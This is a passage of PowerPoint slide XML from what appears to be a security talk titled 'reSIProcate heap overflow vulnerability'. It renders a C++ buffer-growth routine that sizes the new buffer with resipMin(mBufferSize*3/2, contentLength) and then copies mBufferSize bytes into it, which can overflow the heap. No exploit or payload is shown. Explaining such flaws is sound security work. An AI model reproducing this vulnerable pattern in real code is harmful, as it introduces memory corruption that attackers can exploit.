                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>mBufferPos </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> mBufferSize</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>// .bwc. We've filled our buffer; go ahead and make more room.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>size_t newSize </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> resipMin</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>mBufferSize</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="ff8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="ff8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> contentLength</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="8000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> newBuffer </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="ff8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>newBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="8000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>newSize</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>std</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>bad_alloc</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>ErrLog</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>Failed to alloc a buffer while receiving body!"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>newBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> mBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> mBufferSize</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>mBufferSize</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>newSize</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> mBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>mBuffer </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> newBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/* ... */</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581120" y="285840"/>
            <a:ext cx="11245320" cy="1096560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>reSIProcate heap overflow vulnerability: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
